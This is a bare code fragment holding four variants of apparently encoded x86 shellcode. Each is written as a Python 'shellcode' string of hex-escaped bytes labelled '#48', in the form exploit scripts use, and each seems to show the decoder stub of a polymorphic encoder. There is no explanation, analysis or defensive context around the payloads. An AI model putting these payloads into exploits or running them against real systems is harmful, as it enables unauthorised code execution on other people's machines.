#48
shellcode =  ""
shellcode += "\xdb\xcd\xb8\x52\x3f\x12\x65\xd9\x74\x24\xf4\x5a\x2b"
shellcode += "\xc9\xb1\x06\x31\x42\x18\x03\x42\x18\x83\xc2\x56\xdd"
shellcode += "\xe7\x54\x9f\xd6\xe9\x27\x14\x48\x82\x68\x05\x19\x3a"
shellcode += "\x1f\x76\xbf\xd3\xb1\x01\xdc\xe9\xce"

#48
shellcode =  ""
shellcode += "\xda\xdd\xbf\x84\xc0\xdc\xb4\xd9\x74\x24\xf4\x5e\x2b"
shellcode += "\xc9\xb1\x06\x31\x7e\x18\x03\x7e\x18\x83\xee\x78\x22"
shellcode += "\x29\x85\x49\x54\x33\x56\x42\xca\xdc\xb8\x7b\x9f\x74"
shellcode += "\xaf\xac\x3d\xec\x41\x3b\x22\x23\x1d"

#48
shellcode =  ""
shellcode += "\xda\xce\xd9\x74\x24\xf4\x5a\xbd\xbb\x28\xcb\xf5\x2b"
shellcode += "\xc9\xb1\x06\x83\xc2\x04\x31\x6a\x14\x03\x6a\xaf\xca"
shellcode += "\x3e\xc4\x06\xfd\x20\x97\x93\x53\xcb\xf7\x8c\x20\x63"
shellcode += "\x60\xfd\xa4\x1a\x1e\x88\xca\x10\x5e"

#48
shellcode =  ""
shellcode += "\xbd\x49\x9d\x19\x81\xdd\xc5\xd9\x74\x24\xf4\x5e\x29"
shellcode += "\xc9\xb1\x06\x83\xee\xfc\x31\x6e\x0f\x03\x6e\x46\x7f"
shellcode += "\xec\xb0\x91\x88\xee\x03\x2a\x26\x99\x4c\x03\xbb\x31"
shellcode += "\xfb\x74\x59\xab\x95\x03\x7e\xe6\xea"

